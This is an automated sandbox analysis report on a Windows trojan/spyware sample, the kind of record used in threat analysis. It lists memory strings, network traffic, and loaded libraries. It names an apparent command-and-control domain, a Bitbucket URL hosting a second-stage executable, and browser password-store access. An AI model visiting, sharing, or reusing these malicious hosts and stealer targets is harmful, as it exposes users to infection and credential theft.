                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/R
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.00000000011FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: FBmz85HS0d.exe, 00000000.00000002.1874658046.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                Source: FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401268894.00000000011FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/
                Source: FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/6x
                Source: FBmz85HS0d.exe, FBmz85HS0d.exe, 00000000.00000003.1402059464.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401108758.00000000058FE000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1404190506.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1403463916.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1402568335.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405842571.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1403839409.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1404908309.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405410023.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401191621.0000000005901000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400889425.00000000058F4000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1403050358.0000000005902000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1404566168.0000000005902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/api
                Source: FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405842571.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiB
                Source: FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apiice
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apil
                Source: FBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001287000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/aping
                Source: FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/apit
                Source: FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/d
                Source: FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/er.xiK
                Source: FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/nx
                Source: FBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482628618.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/pi
                Source: FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz/s
                Source: FBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cuddlyready.xyz:443/api
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: FBmz85HS0d.exe, 00000000.00000003.1554179926.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877067862.0000000005913000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877331049.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: FBmz85HS0d.exe, 00000000.00000003.1379525182.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: FBmz85HS0d.exe, 00000000.00000003.1379201985.0000000005A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.82:443 -> 192.168.2.7:49752 version: TLS 1.2

                System Summary

                barindex
                Source: FBmz85HS0d.exeStatic PE information: section name:
                Source: FBmz85HS0d.exeStatic PE information: section name: .rsrc
                Source: FBmz85HS0d.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0122C0A90_3_0122C0A9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0122E5C60_3_0122E5C6
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0122C0A90_3_0122C0A9
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_0122E5C60_3_0122E5C6
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeCode function: 0_3_012118470_3_01211847
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876
                Source: FBmz85HS0d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: FBmz85HS0d.exeStatic PE information: Section: ZLIB complexity 0.9974047517123288
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@3/3
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7312
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6fa3acb1-c756-4303-ba0b-c83dca068396Jump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: FBmz85HS0d.exe, 00000000.00000003.1355708769.0000000005920000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1332262093.000000000590C000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1330039591.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: FBmz85HS0d.exeReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile read: C:\Users\user\Desktop\FBmz85HS0d.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\FBmz85HS0d.exe "C:\Users\user\Desktop\FBmz85HS0d.exe"
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: FBmz85HS0d.exeStatic file information: File size 2931712 > 1048576
                Source: FBmz85HS0d.exeStatic PE information: Raw size of avozcotg is bigger than: 0x100000 < 0x2a3c00

                Data Obfuscation

                barindex
